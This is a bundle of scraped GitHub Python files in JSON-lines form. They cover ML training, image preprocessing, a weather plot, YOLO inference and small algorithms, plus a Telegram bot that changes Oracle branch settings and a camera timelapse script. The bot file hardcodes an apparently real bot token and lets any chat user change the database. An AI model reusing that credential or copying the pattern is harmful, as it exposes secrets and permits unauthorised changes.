momentum=0.99, epsilon=0.001, center=True, scale=True)(dropout_output)\n\n flatten_output = layers.Flatten()(batch_norm1)\n batch_norm2 = layers.BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001, center=True, scale=True)(flatten_output)\n dropout_output = layers.Dropout(rate = 0.5)(batch_norm2)\n dense_output1 = layers.Dense(dense_hidden1, activation='relu')(dropout_output)\n batch_norm3 = layers.BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001, center=True, scale=True)(dense_output1)\n dense_output2 = layers.Dense(output_layer, activation='softmax')(batch_norm3)\n lstm_classifier = Model(model_input, dense_output2)\n lstm_classifier.summary()\n\n return lstm_classifier\n\n def buildModelv5(self, timesteps, n_features):\n lstm_hidden1 = 1024\n dense_hidden1 = 64*2\n output_layer = 15\n\n model_input = layers.Input(shape=(timesteps, n_features))\n lstm_output = layers.LSTM(lstm_hidden1, input_shape=(timesteps, n_features), return_sequences=True)(model_input) #previously 96\n dropout_output = layers.Dropout(rate=0.3, noise_shape=(None, None, lstm_hidden1))(lstm_output) #previously 0.4\n\n flatten_output = layers.Flatten()(dropout_output)\n dense_output2 = layers.Dense(output_layer, activation='softmax')(flatten_output)\n lstm_classifier = Model(model_input, dense_output2)\n\n return lstm_classifier\n\n def trainModel(self, lstm_classifier, mode, user_out, setup, learning_rate, type, currentTimestamp, kinvars):\n \"\"\"\n train the lstm model using only fit\n \"\"\"\n\n train = 1\n epochs = 1#30\n num_epochs = 30#len(self.data)\n #print (\"timesteps {} n_features {}\".format(self.dataPath, self.task))\n batch_size = 32\n\n csv_path = os.path.join(self.dataPath, self.task, \"GestureClassification\", kinvars, currentTimestamp, \"csvs\")\n checkpoint_path = os.path.join(self.dataPath, self.task, \"GestureClassification\", kinvars, currentTimestamp, \"checkpoints\")\n self.makePaths(csv_path, checkpoint_path)\n\n plot_model(lstm_classifier, to_file='{}/model.png'.format(checkpoint_path),show_shapes=True)\n\n if train==1:\n for i in range(num_epochs):\n #train and test data\n x_train, y_train, x_test, y_test = self.data[i] #i\n # callbacks\n cp3 = CSVLogger(filename=\"{}/{}{}{}{}.csv\".format(csv_path, setup, mode, user_out, type), append=False if i==0 else True, separator=';')\n cp2 = ModelCheckpoint(filepath=\"{}/exp_segment_classifier_{}{}{}{}.h5\".format(checkpoint_path, setup, mode, user_out, type))\n cp1 = EarlyStopping(monitor='val_acc', min_delta=0.0000, patience=3, verbose=0)\n adam = optimizers.Adam(self.step_decay(i, learning_rate))\n lstm_classifier.compile(optimizer=adam, loss='categorical_crossentropy', metrics=['accuracy'])\n\n #tensorboard = TensorBoard(log_dir=\"logs/{}\".format(mode))\n #fitting model\n lstm_classifier.fit(x_train, y_train, batch_size=batch_size, callbacks =[cp1, cp2, cp3], validation_data=(x_test, y_test))\n\n \"\"\"\n cf_matrix = confusion_matrix(y_test.argmax(axis=1), model_output.argmax(axis=1))\n #print (cf_matrix)\n cmap=plt.cm.Blues\n fig, ax = plt.subplots()\n im = ax.imshow(cf_matrix, interpolation='nearest', cmap=cmap)\n ax.figure.colorbar(im, ax=ax)\n # We want to show all ticks...\n ax.set(xticks=np.arange(cf_matrix.shape[1]), yticks=np.arange(cf_matrix.shape[0]))\n #plt.show()\n \"\"\"\n tf.reset_default_graph()\n gc.collect()\n K.clear_session()\n\n def step_decay(self, epoch, lr):\n \"\"\"\n step_decay function\n \"\"\"\n initial_lrate = lr\n drop = 0.5\n epochs_drop = 5.0\n if epoch>10:\n drop=0.5\n epochs_drop = 3\n\n lrate = initial_lrate * math.pow(drop, math.floor((1+epoch)/epochs_drop))\n print (\"learnign rate {}\".format(lrate))\n return lrate\n\n def makePaths(self, csv_path, checkpoint_path):\n \"\"\"\n This function makes paths for saving model progress, figures and checkpoins\n \"\"\"\n if not os.path.exists(csv_path):\n os.makedirs(csv_path)\n\n if not os.path.exists(checkpoint_path):\n os.makedirs(checkpoint_path)\n","repo_name":"UVA-DSA/ContextMonitor","sub_path":"dsn2020/lstm_experimentalsetup.py","file_name":"lstm_experimentalsetup.py","file_ext":"py","file_size_in_byte":10185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"9468438758","text":"from random import shuffle\n\nimport cv2\nimport numpy as np\nfrom cv2 import cv2\n\nfrom collect_data import VERTICES\n\nWIDTH = 50\nHEIGHT = 50\nSTART_SAVE_DATA = 2\nDATA_RANGE = 1050\nPROCESS_BATCH_SIZE = 10\n\n# TRAINING_DATA_NPY_PATH = 'D:\\Driver/Training Data/Driver/400_400 Approx Images/training_data-{}.npy'\nTRAINING_DATA_NPY_PATH = \\\n 'D:\\MegaSync/Languages/Python/CT83-PC/Driver-Server/computer/training_data/training_data-{}.npy'\n# PROCESSED_DATA_NPY_PATH = 'D:\\Driver/Training Data/Driver/50_50 Long/balanced/training_data-{}.npy'\nPROCESSED_DATA_NPY_PATH = \\\n 'D:\\MegaSync/Languages/Python/CT83-PC/Driver-Server/computer/training_data/processed/training_data-{}.npy'\n\n\ndef balance_data(train_data):\n lefts = []\n rights = []\n forwards = []\n\n for data in train_data:\n img = data[0]\n choice = data[1]\n\n if choice == [1, 0, 0]:\n lefts.append([img, choice])\n elif choice == [0, 1, 0]:\n forwards.append([img, choice])\n elif choice == [0, 0, 1]:\n rights.append([img, choice])\n else:\n print('no matches')\n # input(\"Press Enter to continue...\")\n\n print(\"Lefts:\", len(lefts), \" Forwards:\", len(forwards), \" Rights:\", len(rights))\n forwards = forwards[:len(lefts)][:len(rights)]\n lefts = lefts[:len(forwards)]\n rights = rights[:len(forwards)]\n\n final_data = forwards + lefts + rights\n shuffle(final_data)\n return final_data\n\n\ndef combine_all_data(start_data_range=1, data_range=DATA_RANGE):\n train_data = []\n for j in range(start_data_range, data_range):\n try:\n print(\"Loading training_data-{}.npy\", j)\n inf_from_every_file = np.load(TRAINING_DATA_NPY_PATH.format(j))\n train_data.append(inf_from_every_file)\n except Exception as e:\n print(e)\n print('Failed to Load training_data-{}.npy', j)\n train_data = np.concatenate(train_data)\n return train_data\n\n\ndef data_transform():\n name_ctr = START_SAVE_DATA\n for j in range(1, DATA_RANGE, PROCESS_BATCH_SIZE):\n training_data = []\n try:\n data = combine_all_data(start_data_range=j, data_range=j + PROCESS_BATCH_SIZE)\n\n print(\"Data Shape:\", len(data))\n for frame_input in data:\n image = frame_input[0]\n keys = frame_input[1]\n image = process_img(image, width=WIDTH, height=HEIGHT)\n\n preview_image(image)\n print(keys)\n\n training_data.append([image, keys])\n training_data = balance_data(training_data)\n shuffle(training_data)\n print(\"Saving \", PROCESSED_DATA_NPY_PATH.format(name_ctr))\n # np.save(PROCESSED_DATA_NPY_PATH.format(name_ctr), training_data)\n name_ctr += 1\n except Exception as e:\n print(e)\n\n\ndef preview_image(image, name=\"window\"):\n cv2.imshow(name, cv2.resize(image, (400, 400)))\n if cv2.waitKey(3) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n\n\ndef process_camera_image(original_img):\n process_image = original_img\n process_image = cv2.flip(process_image, 0) # Vertical Flip\n # process_image = imutils.rotate(process_image, 90)\n process_image = cv2.cvtColor(process_image, cv2.COLOR_BGR2RGB)\n return process_image\n\n\ndef process_img(original_img, width=640, height=640):\n processed_img = process_camera_image(original_img)\n # processed_img = cv2.Canny(processed_img, threshold1=25, threshold2=20)\n processed_img = cv2.cvtColor(processed_img, cv2.COLOR_RGB2GRAY)\n\n # processed_img = cv2.resize(processed_img, (width, height))\n processed_img = region_of_interest(processed_img, [VERTICES])\n\n return processed_img\n\n\ndef region_of_interest(img, vertices):\n # defining a blank mask to start with\n mask = np.zeros_like(img)\n\n # defining a 3 channel or 1 channel color to fill the mask with depending on the input image\n if len(img.shape) > 2:\n channel_count = img.shape[2] # i.e. 3 or 4 depending on your image\n ignore_mask_color = (255,) * channel_count\n else:\n ignore_mask_color = 255\n\n # filling pixels inside the polygon defined by \"vertices\" with the fill color\n cv2.fillPoly(mask, vertices, ignore_mask_color)\n\n # returning the image only where mask pixels are nonzero\n masked_image = cv2.bitwise_and(img, mask)\n return masked_image\n\n\nif __name__ == '__main__':\n data_transform()\n","repo_name":"CT83/Driver","sub_path":"training_data_mods/data_transform.py","file_name":"data_transform.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"10809640388","text":"\nclass Node:\n def __init__(self, data=None, next=None):\n self.data = data\n self.next = next\n\n\ndef printList(head):\n ptr = head\n while ptr is not None:\n print(ptr.data, end=\"->\")\n ptr = ptr.next\n print(\"None\")\n\ndef construct():\n return Node(1, Node(2, Node(3, Node(4))))\n\n\nif __name__ == '__main__':\n head = construct()\n printList(head)\n","repo_name":"siddeshbg/my-ds-algorithms","sub_path":"003-linked-lists/03_singly_linked_list_naive_2.py","file_name":"03_singly_linked_list_naive_2.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9739902706","text":"\"\"\"Demonstrates the use of the package.\n\nGets the current weather.\n\nUsage\n-----\n> get_weather.py\nFetching locations...\nINFO:root:Searching data for time window 2022-02-09T09:47:59...2022-02-10T09:47:59.\nINFO:root:Found 1320 entries.\nINFO:root:Latest entry at 2022-02-10 07:50:00.\nLocations:\n Alajärvi Möksy\n Espoo Tapiola\n Haapavesi Mustikkamäki\n...\n Virrat Äijänneva\n Ylivieska lentokenttä\n Ähtäri Inha\n\n> get_weather.py 'Tornio Torppi'\nFetching weather data for location 'Tornio Torppi'...\nINFO:root:Searching data for time window 2022-02-09T09:46:06...2022-02-10T09:46:06.\nINFO:root:Found 76 entries.\nFound weather data for location 'Tornio Torppi'.\nFound data keys:\n times\n WS_10MIN\n WD_10MIN\n WG_10MIN\n T\n RH\n TD\n P_SEA\n R_1H\n VIS\n N_MAN\n WAWA\nAnalyzing data...\nPlotting data...\n\"\"\"\nimport sys\nimport logging\nimport argparse\n\ntry:\n import matplotlib.pyplot as plt\n import pandas as pd\nexcept ImportError as e:\n print(\"ERROR: Extras need to installed in order to run this file.\")\n print(e)\n sys.exit(-1)\n\nfrom epps.weather import get_weather_data, get_locations\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"location\", type=str, nargs='?', default='')\n args = parser.parse_args()\n\n if args.location == '':\n print(\"Fetching locations...\")\n locations = get_locations()\n if locations is None:\n print(\"Could not find any locations.\")\n sys.exit(-1)\n\n print(\"Locations:\")\n for location in locations:\n print(f\"\\t{location}\")\n sys.exit(0)\n\n print(f\"Fetching weather data for location '{args.location}'...\")\n locations, weather_data = get_weather_data(args.location)\n\n if weather_data is None:\n print(f\"Could not fetch weather data for location '{args.location}'.\")\n print(\"Locations:\")\n for location in locations:\n print(f\"\\t{location}\")\n sys.exit(-1)\n\n print(f\"Found weather data for location '{args.location}'.\")\n print(\"Found data keys:\")\n for key in weather_data.keys():\n print(f\"\\t{key}\")\n\n print(\"Analyzing data...\")\n t = weather_data['times']\n d = {key: value['values'] for key, value in weather_data.items() if key != 'times'}\n units = {key: value['unit'] for key, value in weather_data.items() if key != 'times'}\n titles = list(d.keys())\n ylabels = list(units.values())\n\n df = pd.DataFrame.from_dict(d)\n df.index = pd.DatetimeIndex(t)\n\n print(\"Plotting data...\")\n n_cols = 2\n n_rows = int(len(df.columns)/n_cols) + (len(df.columns) % n_cols)\n axs = df.plot(\n subplots=True,\n sharex=True,\n figsize=(4*n_cols, 2*n_rows),\n layout=(n_rows, n_cols),\n title=args.location,\n legend=False,\n color='black',\n )\n\n for row in range(n_rows):\n for col in range(n_cols):\n i = row*n_cols + col\n if i < len(ylabels):\n axs[row, col].set_title(titles[i])\n axs[row, col].set_ylabel(ylabels[i])\n\n \n plt.tight_layout()\n plt.show()\n","repo_name":"juusokorhonen/python-club","sub_path":"session_3/bin/get_weather.py","file_name":"get_weather.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42426915934","text":"import time\nfrom pathlib import Path\n\nimport cv2\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom numpy import random\n\nfrom models.experimental import attempt_load\nfrom utils.datasets import LoadStreams, LoadImages\nfrom utils.general import check_img_size, non_max_suppression, apply_classifier, scale_coords, xyxy2xywh, \\\n strip_optimizer, set_logging, increment_path\n#from utils.plots import plot_one_box\nfrom utils.torch_utils import select_device, load_classifier, time_synchronized\n\nsource = 'data/images/'\nweights = 'weights/best_results.pt'\nimgsz = 416\nconf_thres = 0.25\niou_thres = 0.45\nclasses = ''\nagnostic_nms = ''\n\ndef predict(weights=weights, imgsz=imgsz, source=source):\n\n conf = 0\n\n set_logging()\n device='cpu'\n device = select_device(device)\n half = device.type != 'cpu' \n\n model = attempt_load(weights, map_location=device) # load FP32 model\n imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size\n if half:\n model.half() # to FP16\n\n # Set Dataloader\n vid_path, vid_writer = None, None\n dataset = LoadImages(source, img_size=imgsz)\n\n # Get names and colors\n names = model.module.names if hasattr(model, 'module') else model.names\n colors = [[random.randint(0, 255) for _ in range(3)] for _ in names]\n\n # Run inference\n t0 = time.time()\n img = torch.zeros((1, 3, imgsz, imgsz), device=device) # init img\n _ = model(img.half() if half else img) if device.type != 'cpu' else None # run once\n for path, img, im0s, vid_cap in dataset:\n img = torch.from_numpy(img).to(device)\n img = img.half() if half else img.float() # uint8 to fp16/32\n img /= 255.0 # 0 - 255 to 0.0 - 1.0\n if img.ndimension() == 3:\n img = img.unsqueeze(0)\n\n # Inference\n t1 = time_synchronized()\n pred = model(img)[0]\n\n # Apply NMS\n pred = non_max_suppression(pred, conf_thres, iou_thres, classes, agnostic_nms)\n t2 = time_synchronized()\n\n # Process detections\n for i, det in enumerate(pred): # detections per image\n p, s, im0 = Path(path), '', im0s\n\n gn = torch.tensor(im0.shape)[[1, 0, 1, 0]] # normalization gain whwh\n if len(det):\n # Rescale boxes from img_size to im0 size\n det[:, :4] = scale_coords(img.shape[2:], det[:, :4], im0.shape).round()\n\n # Write results\n for *xyxy, conf, cls in reversed(det):\n \n print('%.2f' % (conf))\n \n print('%sDone. (%.3fs)' % (s, t2 - t1))\n\n return conf\n\n","repo_name":"alkselsv/sensor-detector","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41220623005","text":"class Solution:\n def maxAreaOfIsland(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n m = len(grid)\n n = len(grid[0])\n\n def getarea(i, j):\n if 0 <= i < m and 0 <= j < n and grid[i][j] == 1:\n grid[i][j] = 0\n return 1 + getarea(i - 1, j) + getarea(i, j + 1) + getarea(i + 1, j) + getarea(i, j - 1)\n return 0\n\n max_area = 0\n for i in range(m):\n for j in range(n):\n if grid[i][j]:\n max_area = max(max_area, getarea(i, j))\n \n return max_area","repo_name":"aa4life/LeetCode","sub_path":"695 Max Area of Island/695 Max Area of Island.py","file_name":"695 Max Area of Island.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70587290474","text":"import telebot\nimport cx_Oracle\n\nhost = 'x'\nservico = 'x'\nusuario = 'x'\nsenha = 'x'\n\n# Encontra o arquivo que aponta para o banco de dados\ncx_Oracle.init_oracle_client(lib_dir=\"./instantclient_21_10\")\n\n# Faz a conexão ao banco de dados\nconecta_banco = cx_Oracle.connect(usuario, senha, f'{host}/{servico}')\n\n# Cria um cursor no banco para que seja possível fazer consultas e alterações no banco de dados\ncursor = conecta_banco.cursor()\n\n# Este token é específico do bot criado\nTOKEN = '6418781436:AAE8hyxEjX-TjZec0ghGQVArNXAv6Vulcaw'\n\n# Crie uma instância do bot\nbot = telebot.TeleBot(TOKEN)\n\n# Comando /6cd\n@bot.message_handler(commands=['6cd'])\ndef cd6(message):\n cursor.execute('update pcfilial set tipofilial = 1 where codigo = 6')\n cursor.execute('commit')\n bot.send_message(message.chat.id, \"Filial 6 configurada como CD.\")\n\n# Comando /6loja\n@bot.message_handler(commands=['6loja'])\ndef cd6(message):\n cursor.execute('update pcfilial set tipofilial = 2 where codigo = 6')\n cursor.execute('commit')\n bot.send_message(message.chat.id, \"Filial 6 configurada como LOJA.\")\n \n# Comando /3cd\n@bot.message_handler(commands=['3cd'])\ndef cd6(message):\n cursor.execute('update pcfilial set tipofilial = 1 where codigo = 3')\n cursor.execute('commit')\n bot.send_message(message.chat.id, \"Filial 3 configurada como CD.\")\n \n# Comando /3loja\n@bot.message_handler(commands=['3loja'])\ndef cd6(message):\n cursor.execute('update pcfilial set tipofilial = 2 where codigo = 3')\n cursor.execute('commit')\n bot.send_message(message.chat.id, \"Filial 3 configurada como LOJA.\")\n \n# Comando /4cd\n@bot.message_handler(commands=['4cd'])\ndef cd6(message):\n cursor.execute('update pcfilial set tipofilial = 1 where codigo = 4')\n cursor.execute('commit')\n bot.send_message(message.chat.id, \"Filial 4 configurada como CD.\")\n \n# Comando /4loja\n@bot.message_handler(commands=['4loja'])\ndef cd6(message):\n cursor.execute('update pcfilial set tipofilial = 2 where codigo = 4')\n cursor.execute('commit')\n bot.send_message(message.chat.id, \"Filial 4 configurada como LOJA.\")\n \n# Comando /5cd\n@bot.message_handler(commands=['5cd'])\ndef cd6(message):\n cursor.execute('update pcfilial set tipofilial = 1 where codigo = 5')\n cursor.execute('commit')\n bot.send_message(message.chat.id, \"Filial 5 configurada como CD.\")\n \n# Comando /5loja\n@bot.message_handler(commands=['5loja'])\ndef cd6(message):\n cursor.execute('update pcfilial set tipofilial = 2 where codigo = 5')\n cursor.execute('commit')\n bot.send_message(message.chat.id, \"Filial 5 configurada como LOJA.\")\n \n# Comando /20cd\n@bot.message_handler(commands=['20cd'])\ndef cd6(message):\n cursor.execute('update pcfilial set tipofilial = 1 where codigo = 20')\n cursor.execute('commit')\n bot.send_message(message.chat.id, \"Filial 20 configurada como CD.\")\n \n# Comando /20loja\n@bot.message_handler(commands=['20loja'])\ndef cd6(message):\n cursor.execute('update pcfilial set tipofilial = 2 where codigo = 20')\n cursor.execute('commit')\n bot.send_message(message.chat.id, \"Filial 20 configurada como LOJA.\")\n \n# Comando /70cd\n@bot.message_handler(commands=['70cd'])\ndef cd6(message):\n cursor.execute('update pcfilial set tipofilial = 1 where codigo = 70')\n cursor.execute('commit')\n bot.send_message(message.chat.id, \"Filial 70 configurada como CD.\")\n \n# Comando /70loja\n@bot.message_handler(commands=['70loja'])\ndef cd6(message):\n cursor.execute('update pcfilial set tipofilial = 2 where codigo = 70')\n cursor.execute('commit')\n bot.send_message(message.chat.id, \"Filial 70 configurada como LOJA.\")\n\n# Comando /start\n@bot.message_handler(commands=['start'])\ndef handle_start(message):\n bot.send_message(message.chat.id, \"Bot iniciado. Digite /help para ver os comandos.\")\n\n# Comando /help\n@bot.message_handler(commands=['help'])\ndef handle_help(message):\n bot.send_message(message.chat.id, \"Aqui estão os comandos disponíveis:\\n\\n\"\n \"O comando consiste em digitar / seguido do número da filial e o tipo, se Loja ou CD \\n\"\n \"Exemplos: /6loja /4cd /20loja \\n\"\n \"/start - Iniciar o bot\\n\"\n \"/help - Exibir esta mensagem de ajuda\\n\"\n \"/info - Exibir informações do usuário\")\n\n# Comando /info\n@bot.message_handler(commands=['info'])\ndef handle_info(message):\n user = message.from_user\n bot.send_message(message.chat.id, f\"Nome: {user.first_name}\\n\"\n f\"Sobrenome: {user.last_name}\\n\"\n f\"ID do usuário: {user.id}\")\n\n# Lidar com mensagens de texto não comandos\n@bot.message_handler(func=lambda message: True)\ndef handle_text(message):\n bot.send_message(message.chat.id, \"Comando inexistente. Digite /help para ver os comandos disponíveis.\")\n\n# Iniciar o bot\nif __name__ == \"__main__\":\n bot.polling(none_stop=True)\n","repo_name":"Sipauba/altera-tipo-filial-via-telegram","sub_path":"altera-filial.py","file_name":"altera-filial.py","file_ext":"py","file_size_in_byte":5048,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69813069994","text":"n , m = map(int, input().split())\nmp = [ [*map(int, input().split())] for _ in range(n)]\n\ndp = [ [0]* m for _ in range(n)]\nfor i in range(n):\n s = 0\n for j in range(m):\n if i:\n dp[i][j] += dp[i-1][j]\n dp[i][j] += mp[i][j] + s\n s += mp[i][j]\n\n#print(*dp , sep = '\\n')\nk = int(input())\nfor _ in range(k):\n a , b , c , d = [int(i)-1 for i in input().split()]\n ans = dp[c][d]\n if a:\n ans -= dp[a-1][d]\n if b:\n ans -= dp[c][b-1]\n if a and b:\n ans += dp[a-1][b-1]\n print(ans)\n","repo_name":"JannaKim/PS","sub_path":"dp/15724_주지수.py","file_name":"15724_주지수.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4311821825","text":"#!/usr/bin/env python\n\n# script_timelapse : t.blandin. This script is based on the exemple \n# developped by Jim Eastbrook for the python-gphoto2 lib. \n\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nfrom contextlib import contextmanager\nimport logging\nimport os\nimport subprocess\nimport sys\nimport time\n\nimport gphoto2 as gp\n# Variables\nINTERVAL = 10.0 #in second\nWORK_DIR = '/tmp/timelapse'\nOUT_FILE = 'timelapse.mp4'\nNB_SHOTS = 10\narchive = 'timelapse.7z'\n\n\n\n\n#Configure camera for use\n@contextmanager\ndef configured_camera():\n # initialise camera\n camera = gp.Camera()\n camera.init()\n try:\n # adjust camera settings\n config = camera.get_config()\n capturetarget_conf = config.get_child_by_name('capturetarget')\n capturetarget = capturetarget_conf.get_value()\n capturetarget_conf.set_value('Internal RAM')\n # image version\n imageformat_conf = config.get_child_by_name('imagequality')\n imageformat = imageformat_conf.get_value()\n imageformat_conf.set_value('JPEG Normal')\n # flash off\n flashmode_conf = config.get_child_by_name('flashmode')\n flashmode = flashmode_conf.get_value()\n flashmode_conf.set_value('Flash off')\n # We want to add the intersting settings here\n imagesize_conf=config.get_child_by_name('imagesize')\n imagesize=imagesize_conf.get_value()\n imagesize_conf.set_value('1936x1296')\n # End of the custom settings\n camera.set_config(config)\n # use camera\n yield camera\n finally:\n # reset configuration\n capturetarget_conf.set_value(capturetarget)\n imageformat_conf.set_value(imageformat)\n flashmode_conf.set_value(flashmode)\n imagesize_conf.set_value(imagesize)\n # DON'T FORGET TO RESET THE SETTINGS YOU MODIFY\n camera.set_config(config)\n camera.exit()\n\ndef empty_camera_queue(camera):\n type_ , data = camera.wait_for_event(10)\n while not type_ == gp.GP_EVENT_TIMEOUT :\n type_ , data = camera.wait_for_event(10)\n if type_ == gp.GP_EVENT_FILE_ADDED :\n # Ho no, we have a problem with our imageformat\n print(\"Unexpected new file\", data.folder + data.name)\n return\n\ndef main():\n # settings de logging, usefull for debug\n logging.basicConfig(\n format='%(levelname)s: %(name)s: %(message)s', level=logging.WARNING)\n callback_obj = gp.check_result(gp.use_python_logging())\n if not os.path.exists(WORK_DIR) : \n os.makedirs(WORK_DIR)\n template = os.path.join(WORK_DIR, 'frame%04d.jpg')\n next_shot=time.time()+5.0\n count = 0\n with configured_camera() as camera :\n while count<=NB_SHOTS :\n try :\n empty_camera_queue(camera)\n while time.time() -12 kg\n\n Args:\n cardinal: CardinalFst\n decimal: DecimalFst\n \"\"\"\n\n def __init__(self, cardinal: GraphFst, decimal: GraphFst):\n super().__init__(name=\"measure\", kind=\"verbalize\")\n optional_sign = pynini.closure(pynini.cross(\"negative: \\\"true\\\"\", \"-\"), 0, 1)\n unit = (\n pynutil.delete(\"units:\")\n + delete_space\n + pynutil.delete(\"\\\"\")\n + pynini.closure(NEMO_CHAR - \" \", 1)\n + pynutil.delete(\"\\\"\")\n + delete_space\n )\n graph_decimal = (\n optional_sign\n + delete_space\n + decimal.numbers\n )\n graph_cardinal = (\n optional_sign\n + delete_space\n + cardinal.numbers\n\n )\n graph = (graph_cardinal | graph_decimal) + delete_space + pynutil.insert(\" \") + unit\n delete_tokens = self.delete_tokens(graph)\n self.fst = delete_tokens.optimize()\n","repo_name":"lociko/ukraine_itn_wfst","sub_path":"ukr/verbalizers/measure.py","file_name":"measure.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"9499438224","text":"import re\nfrom typing import Tuple\nimport pyswip\n\nvar_re = re.compile(r\"\\$[a-z][A-Za-z0-9_]*\")\n\ndef get_unique_int() -> int:\n get_unique_int.counter += 1\n return get_unique_int.counter\nget_unique_int.counter = -1\n\n\ndef capitalize_first(s: str) -> str:\n if not s:\n return s\n else:\n return s[0].upper() + s[1:]\n\n\ndef is_var(s: str) -> bool:\n return var_re.fullmatch(s) is not None\n\n\ndef atom_or_var(s: str, delimiter=\"'\") -> str:\n if is_var(s):\n return capitalize_first(s[1:])\n elif s == \"$_\":\n return \"_\"\n else:\n return delimiter + s + delimiter\n\n\ndef get_vars_from_str(s: str) -> dict[str, str]:\n global var_re\n return {m: atom_or_var(m) for m in var_re.findall(s)}\n\n\ndef build_check_pred(check_yaml) -> Tuple[str, str, dict[str, str], str]:\n name = check_yaml[\"name\"]\n description = check_yaml[\"description\"]\n formula = check_yaml[\"check\"]\n ext_vars_dict = get_vars_from_str(description)\n ext_vars = list(ext_vars_dict.values())\n header = f\"{name}({', '.join(ext_vars)})\"\n return header, description, ext_vars_dict, f\"{header} :- {build_formula_term(formula)}\"\n\n\ndef build_term(term) -> str:\n if type(term) is str:\n return atom_or_var(term)\n elif type(term) is list:\n return \"[\" + \", \".join(build_term(t) for t in term) + \"]\"\n elif type(term) is dict:\n assert len(term) == 1, \"Dict term can only have one key\"\n root = list(term)[0]\n assert type(term[root]) is dict \\\n and \"args\" in term[root] \\\n and type(term[root][\"args\"]) is list, \\\n \"Dict term must have an 'args' key with the list of \" \\\n + \"the arguments of the term\"\n return root + \"(\" + \", \".join(build_term(t) for t in term[root][\"args\"]) + \")\"\n else:\n return str(term)\n\n\ndef build_node_pred(node) -> str:\n node_struct_err = \"\"\"Node must have structure:\n :\n [type: ]\n [properties: | $var]\n [capabilities: | $var]\n [requirements: | $var]\"\"\"\n \n assert type(node) is dict and len(node) == 1, node_struct_err\n root = list(node)[0]\n node_name = atom_or_var(root)\n assert type(node[root]) is dict, node_struct_err\n node_type = atom_or_var(node[root].get(\"type\", \"$_\"))\n node_int = get_unique_int()\n\n def build_props_list(props_dict) -> list[str]:\n res = []\n for pname, pval in props_dict.items():\n pname = atom_or_var(pname)\n if type(pval) is str:\n pval = atom_or_var(pval, delimiter='\"')\n res.append(f\"property({pname}, {pval})\")\n return res\n\n props_list = []\n props_var = \"_\"\n if \"properties\" in node[root]:\n if type(node[root][\"properties\"]) is str and is_var(node[root][\"properties\"]):\n props_var = atom_or_var(node[root][\"properties\"])\n else:\n props_var = f\"Props{node_int}\"\n props_list = build_props_list(node[root][\"properties\"])\n \n caps_list = []\n caps_var = \"_\"\n if \"capabilities\" in node[root]:\n if type(node[root][\"capabilities\"]) is str and is_var(node[root][\"capabilities\"]):\n caps_var = atom_or_var(node[root][\"capabilities\"])\n else:\n caps_var = f\"Caps{node_int}\"\n for cname, cdict in node[root][\"capabilities\"].items():\n cname = atom_or_var(cname)\n assert \"properties\" in cdict, \"Capabilities in node should contain properties\"\n cprops_list = build_props_list(cdict[\"properties\"])\n caps_list.append(f\"capability({cname}, [{', '.join(cprops_list)}])\")\n\n reqs_list = []\n reqs_var = \"_\"\n if \"requirements\" in node[root]:\n if type(node[root][\"requirements\"]) is str and is_var(node[root][\"requirements\"]):\n reqs_var = atom_or_var(node[root][\"requirements\"])\n else:\n reqs_var = f\"Reqs{node_int}\"\n for req in node[root][\"requirements\"]:\n rname, rval = list(req.items())[0]\n rname = atom_or_var(rname)\n rval = atom_or_var(rval)\n reqs_list.append(f\"requirement({rname}, {rval})\")\n\n preds = [f\"node({node_name}, {node_type}, {props_var}, {caps_var}, {reqs_var})\"]\n if props_list:\n preds.append(f\"subset([{', '.join(props_list)}], {props_var})\")\n if caps_list:\n preds.append(f\"subset([{', '.join(caps_list)}], {caps_var})\")\n if reqs_list:\n preds.append(f\"subset([{', '.join(reqs_list)}], {reqs_var})\")\n return \", \".join(preds)\n\n\ndef build_typedef_props_list(props_dict) -> list[str]:\n res = []\n for pname, pdict in props_dict.items():\n requiredness = \"_\"\n if pdict.get(\"required\") is not None:\n requiredness = \"true\" if pdict[\"required\"] else \"false\"\n pname = atom_or_var(pname)\n ptype = atom_or_var(pdict.get(\"type\", \"$_\"))\n res.append(f\"property({pname}, {ptype}, {requiredness})\")\n return res\n\n\ndef build_node_type_pred(node_type) -> str:\n node_type_struct_err = \"\"\"Node type must have structure:\n :\n [derived_from: ]\n [properties: | $var]\n [capabilities: | $var]\n [requirements: | $var]\"\"\"\n \n assert type(node_type) is dict and len(node_type) == 1, node_type_struct_err\n root = list(node_type)[0]\n type_name = atom_or_var(root)\n assert type(node_type[root]) is dict, node_type_struct_err\n derived_from = 